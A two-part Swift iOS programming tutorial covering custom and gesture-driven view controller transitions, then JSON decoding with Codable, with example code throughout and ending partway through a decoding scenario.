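func animateTransition(using transitionContext: UIViewControllerContextTransitioning) {
    guard let fromViewController = transitionContext.viewController(forKey: .from),
          let fromView = fromViewController.view,
          let snapShotView = fromView.snapshotView(afterScreenUpdates: false) else {
        transitionContext.completeTransition(false)
        return
    }

    // Animate the snapshot instead of the real (complex) view
    snapShotView.frame = fromView.frame
    transitionContext.containerView.addSubview(snapShotView)
    fromView.isHidden = true

    UIView.animate(withDuration: transitionDuration(using: transitionContext), animations: {
        snapShotView.frame.origin.y = transitionContext.containerView.bounds.height
    }) { _ in
        // Clean up: remove the snapshot and restore the real view
        snapShotView.removeFromSuperview()
        fromView.isHidden = false
        transitionContext.completeTransition(!transitionContext.transitionWasCancelled)
    }
}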
You can also use the newer animation class introduced in iOS ≥ 10 to implement the animation effects; choose based on personal preference or the level of detail required. Although the official recommendation is to use UIViewPropertyAnimator for interactive animations, generally both interactive (gesture-controlled) and non-interactive animations can be done with UIView.animate. UIViewPropertyAnimator allows transition animations to be interrupted and resumed, though I'm not sure where that is practically useful. Interested readers can refer to this article.
import UIKit

class FadeInFadeOutTransition: NSObject, UIViewControllerAnimatedTransitioning {

    private var animatorForCurrentTransition: UIViewImplicitlyAnimating?

    func interruptibleAnimator(using transitionContext: UIViewControllerContextTransitioning) -> UIViewImplicitlyAnimating {

        // Return the current transition animator if it already exists
        if let animatorForCurrentTransition = animatorForCurrentTransition {
            return animatorForCurrentTransition
        }

        // Parameters as mentioned before

        // fromView.frame.origin.y = 100

        let animator = UIViewPropertyAnimator(duration: transitionDuration(using: transitionContext), curve: .linear)

        animator.addAnimations {
            // fromView.frame.origin.y = 0
        }

        animator.addCompletion { (position) in
            transitionContext.completeTransition(!transitionContext.transitionWasCancelled)
        }

        // Hold onto the animator
        self.animatorForCurrentTransition = animator
        return animator
    }

    func transitionDuration(using transitionContext: UIViewControllerContextTransitioning?) -> TimeInterval {
        return 0.4
    }

    func animateTransition(using transitionContext: UIViewControllerContextTransitioning) {
        // For non-interactive transitions, use the interruptible animator as well
        let animator = self.interruptibleAnimator(using: transitionContext)
        animator.startAnimation()
    }

    func animationEnded(_ transitionCompleted: Bool) {
        // Clear the animator when the animation is complete
        self.animatorForCurrentTransition = nil
    }

}
In interactive scenarios (detailed later in the control section), the interruptibleAnimator method is used for the animation; in non-interactive scenarios, the animateTransition method is still used.
Because it can be interrupted and resumed, the interruptibleAnimator method may be called repeatedly, so we need a property to store and return the same animator.
Murmur… Actually, I initially wanted to switch entirely to the new UIViewPropertyAnimator
and recommend everyone to use it, but I encountered a very strange issue. When performing a full-page gesture return Pop animation, if the gesture is released and the animation returns to its original position, the items on the Navigation Bar above will flicker with a fade-in and fade-out effect… I couldn’t find a solution, but reverting to UIView.animate
resolved the issue. If there’s something I missed, please let me know <( _ _ )>.
Problem image; + button is from the previous page
So, to be safe, let’s stick with the old method!
In practice, different animation effects will be created in separate classes. If you find the files too cluttered, you can refer to the packaged solution at the end of the article or group related (Present + Dismiss) animations together.
Additionally, if you need more precise control, such as having a specific component within the ViewController change along with the transition animation, you can use the transitionCoordinator in UIViewController for coordination. I didn't use this part; if you're interested, you can refer to this article. A small sketch follows below.
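A small sketch of that coordination (not used in this article's examples; headerView is a hypothetical subview whose alpha we fade alongside the transition):

override func viewWillDisappear(_ animated: Bool) {
    super.viewWillDisappear(animated)
    // Run our own animation alongside the system transition animation
    transitionCoordinator?.animate(alongsideTransition: { _ in
        self.headerView.alpha = 0
    }, completion: nil)
}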
This is the aforementioned “interactive” part, which is essentially gesture control. This is the most important section of this article because we aim to achieve the functionality of gesture operations linked with transition animations, enabling us to implement pull-to-close and full-page return features.
Similar to the ViewController
delegate animation design mentioned earlier, the interactive handling class also needs to inform the ViewController
in the delegate.
UITabBarController: none.
UINavigationController (Push/Pop):
import UIKit

class HomeNavigationController: UINavigationController {

    override func viewDidLoad() {
        super.viewDidLoad()

        self.delegate = self
    }

}

extension HomeNavigationController: UINavigationControllerDelegate {
    func navigationController(_ navigationController: UINavigationController, animationControllerFor operation: UINavigationController.Operation, from fromVC: UIViewController, to toVC: UIViewController) -> UIViewControllerAnimatedTransitioning? {

        if operation == .pop {
            return nil // return the UIViewControllerAnimatedTransitioning animation to apply when popping
        } else if operation == .push {
            return nil // return the UIViewControllerAnimatedTransitioning animation to apply when pushing
        }
        // Returning nil uses the default animation
        return nil
    }

    // Added interactive delegate method:
    func navigationController(_ navigationController: UINavigationController, interactionControllerFor animationController: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
        // We cannot tell Pop from Push here; we can only judge from the animation object itself, e.g.:
        // if animationController is <the animation class applied during push> {
        //     return <the UIPercentDrivenInteractiveTransition controlling the push animation>
        // } else if animationController is <the animation class applied during pop> {
        //     return <the UIPercentDrivenInteractiveTransition controlling the pop animation>
        // }
        // Returning nil means no interactive handling
        return nil
    }
}
UIViewController (Present/Dismiss):
import UIKit

class HomeAddViewController: UIViewController {

    override func viewDidLoad() {
        super.viewDidLoad()

        self.modalPresentationStyle = .custom
        self.transitioningDelegate = self
    }

}

extension HomeAddViewController: UIViewControllerTransitioningDelegate {

    func interactionControllerForDismissal(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
        // Returning nil means no interactive handling
        return nil // return the UIPercentDrivenInteractiveTransition controlling the Dismiss animation
    }

    func interactionControllerForPresentation(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
        // Returning nil means no interactive handling
        return nil // return the UIPercentDrivenInteractiveTransition controlling the Present animation
    }

    func animationController(forPresented presented: UIViewController, presenting: UIViewController, source: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        // Returning nil means using the default animation
        return nil // return the UIViewControllerAnimatedTransitioning animation to apply during Present
    }

    func animationController(forDismissed dismissed: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        // Returning nil means using the default animation
        return nil // return the UIViewControllerAnimatedTransitioning animation to apply during Dismiss
    }

}
⚠️⚠️⚠️⚠️⚠️
If you implement the interactionControllerFor… methods, they are called even for non-interactive transitions (e.g., a plain self.present call); we need to control this with the wantsInteractiveStart parameter (introduced below).
Next, let's talk about the core implementation of UIPercentDrivenInteractiveTransition.
import UIKit

class PullToDismissInteractive: UIPercentDrivenInteractiveTransition {

    // UIView to attach the gesture-controlled interaction to
    private var interactiveView: UIView!
    // Current UIViewController
    private var presented: UIViewController!
    // Threshold percentage to complete the transition, otherwise revert
    private let threshold: CGFloat = 0.4

    // Different transition effects may require different information; customizable
    convenience init(_ presented: UIViewController, _ interactiveView: UIView) {
        self.init()
        self.interactiveView = interactiveView
        self.presented = presented
        setupPanGesture()

        // Default value; informs the system that the current animation is non-interactive
        wantsInteractiveStart = false
    }

    private func setupPanGesture() {
        let panGesture = UIPanGestureRecognizer(target: self, action: #selector(handlePan(_:)))
        panGesture.maximumNumberOfTouches = 1
        panGesture.delegate = self
        interactiveView.addGestureRecognizer(panGesture)
    }

    @objc func handlePan(_ sender: UIPanGestureRecognizer) {
        switch sender.state {
        case .began:
            // Reset gesture position
            sender.setTranslation(.zero, in: interactiveView)
            // Inform the system that the current animation is triggered by a gesture
            wantsInteractiveStart = true

            // Call the transition to be performed when the gesture begins (it won't execute immediately; the system holds it)
            // The corresponding animation then goes to UIViewControllerAnimatedTransitioning for handling
            // animated must be true, otherwise there is no animation

            // Dismiss:
            self.presented.dismiss(animated: true, completion: nil)
            // Present:
            //self.present(presenting, animated: true)
            // Push:
            //self.navigationController.push(presenting)
            // Pop:
            //self.navigationController.pop(animated: true)

        case .changed:
            // Convert the gesture position into an animation completion percentage 0~1
            // The actual calculation varies depending on the animation type
            let translation = sender.translation(in: interactiveView)
            guard translation.y >= 0 else {
                sender.setTranslation(.zero, in: interactiveView)
                return
            }
            let percentage = abs(translation.y / interactiveView.bounds.height)

            // Update the UIViewControllerAnimatedTransitioning animation percentage
            update(percentage)
        case .ended:
            // When the gesture is released, check whether the completion percentage exceeds the threshold
            wantsInteractiveStart = false
            if percentComplete >= threshold {
                // Yes, tell the animation to complete
                finish()
            } else {
                // No, tell the animation to revert
                cancel()
            }
        case .cancelled, .failed:
            // On cancel or error
            wantsInteractiveStart = false
            cancel()
        default:
            wantsInteractiveStart = false
            return
        }
    }
}

// When there are UIScrollView components (UITableView/UICollectionView/WKWebView...) inside the UIViewController, prevent gesture conflicts
// Only enable the interactive transition gesture when the inner UIScrollView has scrolled to the top
extension PullToDismissInteractive: UIGestureRecognizerDelegate {
    func gestureRecognizer(_ gestureRecognizer: UIGestureRecognizer, shouldRecognizeSimultaneouslyWith otherGestureRecognizer: UIGestureRecognizer) -> Bool {
        if let scrollView = otherGestureRecognizer.view as? UIScrollView {
            if scrollView.contentOffset.y <= 0 {
                return true
            } else {
                return false
            }
        }
        return true
    }

}
*For the reason behind sender.setTranslation(.zero, in: interactiveView), see the supplementary note (click me).
We need to implement different classes for different gesture-driven effects; if it is the same continuous operation (Present + Dismiss), they can also be wrapped together.
⚠️⚠️⚠️⚠️⚠️
wantsInteractiveStart must reflect the correct state. If wantsInteractiveStart = false is reported while an interactive animation is in progress, the screen will also freeze, and you have to kill and relaunch the app to recover.
⚠️⚠️⚠️⚠️⚠️
interactiveView must also have isUserInteractionEnabled = true; it doesn't hurt to set it explicitly to be safe!
Once we have set up this Delegate and built the Class, we can achieve the functionality we want. Let's not waste any more time and go straight to the completed example.
The advantage of custom pull-down is that it supports all iOS versions on the market, can control the overlay percentage, control the trigger close position, and customize the animation effect.
Click the top right + Present page
This is an example of HomeViewController presenting HomeAddViewController and HomeAddViewController dismissing.
import UIKit

class HomeViewController: UIViewController {

    @IBAction func addButtonTapped(_ sender: Any) {
        guard let homeAddViewController = UIStoryboard(name: "Main", bundle: nil).instantiateViewController(identifier: "HomeAddViewController") as? HomeAddViewController else {
            return
        }

        // transitioningDelegate can be the target ViewController or the current ViewController
        homeAddViewController.transitioningDelegate = homeAddViewController
        homeAddViewController.modalPresentationStyle = .custom
        self.present(homeAddViewController, animated: true, completion: nil)
    }

}

import UIKit

class HomeAddViewController: UIViewController {

    private var pullToDismissInteractive: PullToDismissInteractive!

    override func viewDidLoad() {
        super.viewDidLoad()

        // Bind the transition interactive information
        self.pullToDismissInteractive = PullToDismissInteractive(self, self.view)
    }

}

extension HomeAddViewController: UIViewControllerTransitioningDelegate {

    func interactionControllerForDismissal(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
        return pullToDismissInteractive
    }

    func animationController(forPresented presented: UIViewController, presenting: UIViewController, source: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        return PresentAndDismissTransition(false)
    }

    func animationController(forDismissed dismissed: UIViewController) -> UIViewControllerAnimatedTransitioning? {
        return PresentAndDismissTransition(true)
    }

    func interactionControllerForPresentation(using animator: UIViewControllerAnimatedTransitioning) -> UIViewControllerInteractiveTransitioning? {
        // No Present gesture here
        return nil
    }
}

import UIKit

class PullToDismissInteractive: UIPercentDrivenInteractiveTransition {

    private var interactiveView: UIView!
    private var presented: UIViewController!
    private var completion: (() -> Void)?
    private let threshold: CGFloat = 0.4

    convenience init(_ presented: UIViewController, _ interactiveView: UIView, _ completion: (() -> Void)? = nil) {
        self.init()
        self.interactiveView = interactiveView
        self.completion = completion
        self.presented = presented
        setupPanGesture()

        wantsInteractiveStart = false
    }

    private func setupPanGesture() {
        let panGesture = UIPanGestureRecognizer(target: self, action: #selector(handlePan(_:)))
        panGesture.maximumNumberOfTouches = 1
        panGesture.delegate = self
        interactiveView.addGestureRecognizer(panGesture)
    }

    @objc func handlePan(_ sender: UIPanGestureRecognizer) {
        switch sender.state {
        case .began:
            sender.setTranslation(.zero, in: interactiveView)
            wantsInteractiveStart = true

            self.presented.dismiss(animated: true, completion: self.completion)
        case .changed:
            let translation = sender.translation(in: interactiveView)
            guard translation.y >= 0 else {
                sender.setTranslation(.zero, in: interactiveView)
                return
            }

            let percentage = abs(translation.y / interactiveView.bounds.height)
            update(percentage)
        case .ended:
            if percentComplete >= threshold {
                finish()
            } else {
                wantsInteractiveStart = false
                cancel()
            }
        case .cancelled, .failed:
            wantsInteractiveStart = false
            cancel()
        default:
            wantsInteractiveStart = false
            return
        }
    }
}

extension PullToDismissInteractive: UIGestureRecognizerDelegate {
    func gestureRecognizer(_ gestureRecognizer: UIGestureRecognizer, shouldRecognizeSimultaneouslyWith otherGestureRecognizer: UIGestureRecognizer) -> Bool {
        if let scrollView = otherGestureRecognizer.view as? UIScrollView {
            if scrollView.contentOffset.y <= 0 {
                return true
            } else {
                return false
            }
        }
        return true
    }

}
With the above, you can achieve the effect shown in the image. The code here is kept loose for tutorial simplicity, so there is plenty of room for optimization and integration.
Worth mentioning…
iOS ≥ 13, if the View contains a UITextView, during the pull-down close animation, the text content of the UITextView will be blank; causing a flicker in the experience (video example) …
The solution here is to use snapshotView(afterScreenUpdates:) to replace the original view layer during the animation.
When looking for a solution to enable the right-swipe back gesture for the entire screen, I found a tricky method: directly add a UIPanGestureRecognizer to the screen and set its target and action to the native interactivePopGestureRecognizer with the action handleNavigationTransition. *For the detailed method, click me.
That’s right! It looks like a Private API, and it feels like it might get rejected during review; also, it’s uncertain if it works with Swift, as it might use Runtime features specific to Objective-C.
Using the same method as in this article, we handle the navigationController
POP back ourselves; add a full-page right swipe gesture control with a custom right swipe animation!
Other parts are omitted, only the key animation and interaction handling class is posted:
import UIKit

class SwipeBackInteractive: UIPercentDrivenInteractiveTransition {

    private var interactiveView: UIView!
    private var navigationController: UINavigationController!

    private let threshold: CGFloat = 0.4

    convenience init(_ navigationController: UINavigationController, _ interactiveView: UIView) {
        self.init()
        self.interactiveView = interactiveView

        self.navigationController = navigationController
        setupPanGesture()

        wantsInteractiveStart = false
    }

    private func setupPanGesture() {
        let panGesture = UIPanGestureRecognizer(target: self, action: #selector(handlePan(_:)))
        panGesture.maximumNumberOfTouches = 1
        interactiveView.addGestureRecognizer(panGesture)
    }

    @objc func handlePan(_ sender: UIPanGestureRecognizer) {

        switch sender.state {
        case .began:
            sender.setTranslation(.zero, in: interactiveView)
            wantsInteractiveStart = true

            self.navigationController.popViewController(animated: true)
        case .changed:
            let translation = sender.translation(in: interactiveView)
            guard translation.x >= 0 else {
                sender.setTranslation(.zero, in: interactiveView)
                return
            }

            let percentage = abs(translation.x / interactiveView.bounds.width)
            update(percentage)
        case .ended:
            if percentComplete >= threshold {
                finish()
            } else {
                wantsInteractiveStart = false
                cancel()
            }
        case .cancelled, .failed:
            wantsInteractiveStart = false
            cancel()
        default:
            wantsInteractiveStart = false
            return
        }
    }
}
On the View, pull up to fade in + pull down to close, which creates a transition effect similar to Spotify’s player!
This part is more tedious, but the principle is the same. I won’t post it here, but interested friends can refer to the GitHub example content.
One thing to note is that for the pull-up fade-in, the animation must use the .curveLinear option; otherwise the pull-up will not follow the finger, and the amount dragged will not be proportional to the displayed position.
Completed Image
This article is very long and took me a long time to organize and produce. Thank you for your patience in reading.
References:
For elegant code encapsulation references:
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
From basic to advanced, deeply using Decodable to meet all possible problem scenarios
Photo by Gustas Brazaitis
Due to a backend API upgrade, we needed to adjust our API processing architecture, and we took the opportunity to migrate the original network layer written in Objective-C to Swift. Because of the language change, it no longer made sense to keep using RestKit for our network layer. That said, RestKit is very powerful and served the project well with almost no major issues, but it is relatively cumbersome, barely maintained anymore, and pure Objective-C, so it would inevitably have to be replaced sooner or later.
RestKit handled almost every network-related function we needed: basic networking, API calls, mapping the response JSON string to objects, and even storing objects into Core Data. It was a framework that could do it all at once.
With the evolution of the times, the current frameworks no longer focus on an all-in-one package but more on flexibility, lightness, and combination, increasing more flexibility and creating more variations. Therefore, when replacing it with Swift, we chose to use Moya as the network processing part of the package, and other functions we needed were combined in other ways.
For the JSON String to Object Mapping part, we use Swift’s built-in Codable (Decodable) protocol & JSONDecoder for processing. We split the Entity/Model to enhance responsibility separation, operation, and readability. Additionally, we also need to consider the code base mixing Objective-C and Swift.
* The Encodable part is omitted, and the examples only show the implementation of Decodable. They are similar; if you can decode, you can also encode.
Assume our initial API Response JSON String is as follows:
{
  "id": 123456,
  "comment": "It's Accusefive, not Five Accuse!",
  "target_object": {
    "type": "song",
    "id": 99,
    "name": "Thinking of You Under the Stars"
  },
  "commenter": {
    "type": "user",
    "id": 1,
    "name": "zhgchgli",
    "email": "zhgchgli@gmail.com"
  }
}
From the above example, we can split it into three entities & models: User, Song, and Comment. For convenience, let’s write the Entity/Model in the same file.
User:
// Entity:
struct UserEntity: Decodable {
    var id: Int
    var name: String
    var email: String
}

// Model:
class UserModel: NSObject {
    init(_ entity: UserEntity) {
        self.id = entity.id
        self.name = entity.name
        self.email = entity.email
    }
    var id: Int
    var name: String
    var email: String
}
Song:
// Entity:
struct SongEntity: Decodable {
    var id: Int
    var name: String
}

// Model:
class SongModel: NSObject {
    init(_ entity: SongEntity) {
        self.id = entity.id
        self.name = entity.name
    }
    var id: Int
    var name: String
}
Comment:
// Entity:
struct CommentEntity: Decodable {
    enum CodingKeys: String, CodingKey {
        case id
        case comment
        case targetObject = "target_object"
        case commenter
    }

    var id: Int
    var comment: String
    var targetObject: SongEntity
    var commenter: UserEntity
}

// Model:
class CommentModel: NSObject {
    init(_ entity: CommentEntity) {
        self.id = entity.id
        self.comment = entity.comment
        self.targetObject = SongModel(entity.targetObject)
        self.commenter = UserModel(entity.commenter)
    }
    var id: Int
    var comment: String
    var targetObject: SongModel
    var commenter: UserModel
}
JSONDecoder:
let jsonString = "{ \"id\": 123456, \"comment\": \"It's Accusefive, not Five Accuse!\", \"target_object\": { \"type\": \"song\", \"id\": 99, \"name\": \"Thinking of You Under the Stars\" }, \"commenter\": { \"type\": \"user\", \"id\": 1, \"name\": \"zhgchgli\", \"email\": \"zhgchgli@gmail.com\" } }"
let jsonDecoder = JSONDecoder()
do {
    let result = try jsonDecoder.decode(CommentEntity.self, from: jsonString.data(using: .utf8)!)
} catch {
    print(error)
}
When our JSON String Key Name does not match the Entity Object Property Name, we can add a CodingKeys enum internally to map them, as we cannot control the naming convention of the backend data source.
case PropertyKeyName = "backend_field_name"
case PropertyKeyName // If not specified, the default is to use PropertyKeyName as the backend field name
Once the CodingKeys enum is added, all non-Optional fields must be enumerated, and you cannot just list the keys you want to customize.
Another way is to set the keyDecodingStrategy of JSONDecoder. If the response fields and property names differ only by snake_case <-> camelCase, you can simply set .keyDecodingStrategy = .convertFromSnakeCase to map them automatically.
let jsonDecoder = JSONDecoder()
jsonDecoder.keyDecodingStrategy = .convertFromSnakeCase
try jsonDecoder.decode(CommentEntity.self, from: jsonString.data(using: .utf8)!)
struct SongListEntity: Decodable {
    var songs: [SongEntity]
}
struct SongEntity: Decodable {
    var id: Int
    var name: String
    var type: SongType

    enum SongType: String, Decodable {
        case rock
        case pop
        case country
    }
}
Applicable to string fields with a limited range of values; writing them as enums makes them convenient to pass around and use. If a value appears that is not enumerated, decoding will fail! (A sketch of a more tolerant fallback follows below.)
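If you would rather not fail on unexpected values, one common approach (a sketch, not from the original article) is to add an unknown case with a custom init:

enum SongType: String, Decodable {
    case rock
    case pop
    case country
    case unknown

    init(from decoder: Decoder) throws {
        let container = try decoder.singleValueContainer()
        let rawValue = try container.decode(String.self)
        // Fall back to .unknown instead of throwing when the backend adds a new type
        self = SongType(rawValue: rawValue) ?? .unknown
    }
}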
Assuming the JSON strings returned by several endpoints share a fixed paging format:
{
  "count": 10,
  "offset": 0,
  "limit": 0,
  "results": [
    {
      "type": "song",
      "id": 1,
      "name": "1"
    }
  ]
}
You can wrap it using generics:
struct PageEntity<E: Decodable>: Decodable {
    var count: Int
    var offset: Int
    var limit: Int
    var results: [E]
}
Usage: PageEntity<SongEntity>.self (a usage sketch follows below).
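A minimal usage sketch (assuming the simple SongEntity with only id and name from the beginning of the article):

let pageJSON = "{ \"count\": 10, \"offset\": 0, \"limit\": 0, \"results\": [ { \"id\": 1, \"name\": \"1\" } ] }"
let pageDecoder = JSONDecoder()
do {
    let page = try pageDecoder.decode(PageEntity<SongEntity>.self, from: pageJSON.data(using: .utf8)!)
    print(page.results.first?.name ?? "")
} catch {
    print(error)
}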
Set the dateDecodingStrategy of JSONDecoder:
.secondsSince1970 / .millisecondsSince1970: Unix timestamp
.deferredToDate: Apple's timestamp; rarely used, and unlike the Unix timestamp it counts from 2001/01/01
.iso8601: ISO 8601 date format
.formatted(DateFormatter): decode the Date according to the passed-in DateFormatter
.custom: custom Date decoding logic
.custom example: assuming the API returns both yyyy-MM-dd and ISO 8601 formats and both need to be decoded:
let dateFormatter = DateFormatter()
let iso8601DateFormatter = ISO8601DateFormatter()

let decoder: JSONDecoder = JSONDecoder()
decoder.dateDecodingStrategy = .custom({ (decoder) -> Date in
    let container = try decoder.singleValueContainer()
    let dateString = try container.decode(String.self)

    // ISO 8601:
    if let date = iso8601DateFormatter.date(from: dateString) {
        return date
    }

    // yyyy-MM-dd:
    dateFormatter.dateFormat = "yyyy-MM-dd"
    if let date = dateFormatter.date(from: dateString) {
        return date
    }

    throw DecodingError.dataCorruptedError(in: container, debugDescription: "Cannot decode date string \(dateString)")
})

let result = try decoder.decode(CommentEntity.self, from: jsonString.data(using: .utf8)!)
*DateFormatter is very expensive to initialize; reuse it as much as possible (a small sketch follows below).
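A small sketch of one way to reuse formatters (just an illustrative pattern, not from the original article):

enum SharedDateFormatters {
    // Created once and reused; creating a DateFormatter repeatedly is expensive
    static let yyyyMMdd: DateFormatter = {
        let formatter = DateFormatter()
        formatter.dateFormat = "yyyy-MM-dd"
        return formatter
    }()
    static let iso8601 = ISO8601DateFormatter()
}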
So far we have covered the basic usage, but the real world is not that simple. Below are some advanced scenarios you might encounter and how to solve them with Codable. From here on, we can no longer rely on the synthesized decoding to do the mapping for us; we need to implement init(from decoder: Decoder) for custom decode operations.
*For now, we will only show the Entity part; the Model is not needed yet.
In init(from decoder:), you must assign values to all non-Optional properties (it is an init, after all).
When customizing the decode operation, we need to get a container from the decoder to read values from. There are three kinds of containers.
First kind, container(keyedBy: CodingKeys.self), which reads values according to CodingKeys:
struct SongEntity: Decodable {
    var id: Int
    var name: String

    enum CodingKeys: String, CodingKey {
        case id
        case name
    }

    init(from decoder: Decoder) throws {
        let container = try decoder.container(keyedBy: CodingKeys.self)
        self.id = try container.decode(Int.self, forKey: .id)
        // Parameter 1: any type conforming to Decodable
        // Parameter 2: the CodingKey to read

        self.name = try container.decode(String.self, forKey: .name)
    }
}
Second kind, singleValueContainer(), which reads the whole payload as a single value:
enum HandsomeLevel: Decodable {
    case handsome(String)
    case normal(String)
    init(from decoder: Decoder) throws {
        let container = try decoder.singleValueContainer()
        let name = try container.decode(String.self)
        if name == "zhgchgli" {
            self = .handsome(name)
        } else {
            self = .normal(name)
        }
    }
}

struct UserEntity: Decodable {
    var id: Int
    var name: HandsomeLevel
    var email: String

    enum CodingKeys: String, CodingKey {
        case id
        case name
        case email
    }
}
Suitable for Associated Value Enum field types, for example, name also carries a level of handsomeness!
Third kind, unkeyedContainer(), which treats the whole payload as an array:
struct ListEntity: Decodable {
    var items: [Decodable]
    init(from decoder: Decoder) throws {
        var unkeyedContainer = try decoder.unkeyedContainer()
        self.items = []
        while !unkeyedContainer.isAtEnd {
            // The internal cursor of unkeyedContainer automatically moves to the next element after each decode
            // Until it reaches the end, meaning the traversal is complete
            if let id = try? unkeyedContainer.decode(Int.self) {
                items.append(id)
            } else if let name = try? unkeyedContainer.decode(String.self) {
                items.append(name)
            }
        }
    }
}

let jsonString = "[\"test\",1234,5566]"
let jsonDecoder = JSONDecoder()
let result = try jsonDecoder.decode(ListEntity.self, from: jsonString.data(using: .utf8)!)
print(result)
This is applicable to array fields whose element types vary.
*Flattening nested data fields (similar to flatMap):
struct ListEntity: Decodable {
+
+ enum CodingKeys: String, CodingKey {
+ case items
+ case date
+ case name
+ case target
+ }
+
+ enum PredictKey: String, CodingKey {
+ case type
+ }
+
+ var date: Date
+ var name: String
+ var items: [Decodable]
+ var target: Decodable
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+
+ self.date = try container.decode(Date.self, forKey: .date)
+ self.name = try container.decode(String.self, forKey: .name)
+
+ let nestedContainer = try container.nestedContainer(keyedBy: PredictKey.self, forKey: .target)
+
+ let type = try nestedContainer.decode(String.self, forKey: .type)
+ if type == "song" {
+ self.target = try container.decode(SongEntity.self, forKey: .target)
+ } else {
+ self.target = try container.decode(UserEntity.self, forKey: .target)
+ }
+
+ var unkeyedContainer = try container.nestedUnkeyedContainer(forKey: .items)
+ self.items = []
+ while !unkeyedContainer.isAtEnd {
+ if let song = try? unkeyedContainer.decode(SongEntity.self) {
+ items.append(song)
+ } else if let user = try? unkeyedContainer.decode(UserEntity.self) {
+ items.append(user)
+ }
+ }
+ }
+}
+
This lets you access and decode objects at different levels. The example uses nestedContainer to peek at the type inside target/items first and then decode accordingly.
*The above is only a brief introduction to init(from decoder:) and the container methods. It's fine if it doesn't all click yet; we'll dive straight into real-world scenarios and see how these pieces combine in the examples.
Returning to the original example JSON string.
The targetObject field could be a User or a Song. How should we handle it?
{
+ "results": [
+ {
+ "id": 123456,
+ "comment": "It's Accusefive, not Five Accuse!",
+ "target_object": {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com"
+ }
+ },
+ {
+ "id": 55,
+ "comment": "66666!",
+ "target_object": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 2,
+ "name": "aaaa",
+ "email": "aaaa@gmail.com"
+ }
+ }
+ ]
+}
+
a. Use an enum as a container for decoding.
struct CommentEntity: Decodable {
+
+ enum CodingKeys: String, CodingKey {
+ case id
+ case comment
+ case targetObject = "target_object"
+ case commenter
+ }
+
+ var id: Int
+ var comment: String
+ var targetObject: TargetObject
+ var commenter: UserEntity
+
+ enum TargetObject: Decodable {
+ case song(SongEntity)
+ case user(UserEntity)
+
+ enum PredictKey: String, CodingKey {
+ case type
+ }
+
+ enum TargetObjectType: String, Decodable {
+ case song
+ case user
+ }
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: PredictKey.self)
+ let singleValueContainer = try decoder.singleValueContainer()
+ let targetObjectType = try container.decode(TargetObjectType.self, forKey: .type)
+
+ switch targetObjectType {
+ case .song:
+ let song = try singleValueContainer.decode(SongEntity.self)
+ self = .song(song)
+ case .user:
+ let user = try singleValueContainer.decode(UserEntity.self)
+ self = .user(user)
+ }
+ }
+ }
+}
+
We change the targetObject property to an associated-value enum and decide what to put inside the enum during decoding.
The core practice is to create a Decodable enum as a container: first decode the key field (the type field in the example JSON), and if it is song, use singleValueContainer to decode the whole payload into SongEntity; likewise for user.
Extract the value from the enum at the point of use:
//if case let
+if case let CommentEntity.TargetObject.user(user) = result.targetObject {
+ print(user)
+} else if case let CommentEntity.TargetObject.song(song) = result.targetObject {
+ print(song)
+}
+
+//switch case let
+switch result.targetObject {
+case .song(let song):
+ print(song)
+case .user(let user):
+ print(user)
+}
+
b. Declare the field property with a base type (here, Decodable).
struct CommentEntity: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case id
+ case comment
+ case targetObject = "target_object"
+ case commenter
+ }
+ enum PredictKey: String, CodingKey {
+ case type
+ }
+
+ var id: Int
+ var comment: String
+ var targetObject: Decodable
+ var commenter: UserEntity
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+ self.id = try container.decode(Int.self, forKey: .id)
+ self.comment = try container.decode(String.self, forKey: .comment)
+ self.commenter = try container.decode(UserEntity.self, forKey: .commenter)
+
+ // Peek into target_object first to read its type
+ let targetObjectContainer = try container.nestedContainer(keyedBy: PredictKey.self, forKey: .targetObject)
+ let targetObjectType = try targetObjectContainer.decode(String.self, forKey: .type)
+ if targetObjectType == "user" {
+ self.targetObject = try container.decode(UserEntity.self, forKey: .targetObject)
+ } else {
+ self.targetObject = try container.decode(SongEntity.self, forKey: .targetObject)
+ }
+ }
+}
+
The principle is similar, but here we first use nestedContainer to dive into targetObject, read its type, and then decide which concrete type targetObject should be decoded into.
Cast at the point of use:
if let song = result.targetObject as? SongEntity {
+ print(song)
+} else if let user = result.targetObject as? UserEntity {
+ print(user)
+}
+
{
+ "results": [
+ {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com"
+ }
+ ]
+}
+
Combine the nestedUnkeyedContainer mentioned above with the solution from Scenario 1; alternatively, you can use Scenario 1's solution a and store the values in an associated-value enum.
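A minimal sketch of that enum-based variant (the ResultsEntity and Item names here are illustrative; SongEntity and UserEntity are the entities defined earlier). With an associated-value enum as the element type, the synthesized decoding of the array already iterates over it for us:

struct ResultsEntity: Decodable {
    enum Item: Decodable {
        case song(SongEntity)
        case user(UserEntity)

        enum PredictKey: String, CodingKey {
            case type
        }

        init(from decoder: Decoder) throws {
            // Peek at the type field first, then decode the whole payload into the matching entity
            let container = try decoder.container(keyedBy: PredictKey.self)
            let singleValueContainer = try decoder.singleValueContainer()
            let type = try container.decode(String.self, forKey: .type)
            if type == "song" {
                self = .song(try singleValueContainer.decode(SongEntity.self))
            } else {
                self = .user(try singleValueContainer.decode(UserEntity.self))
            }
        }
    }

    var results: [Item]
}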
[
+ {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ {
+ "type": "song",
+ "id": 11
+ }
+]
+
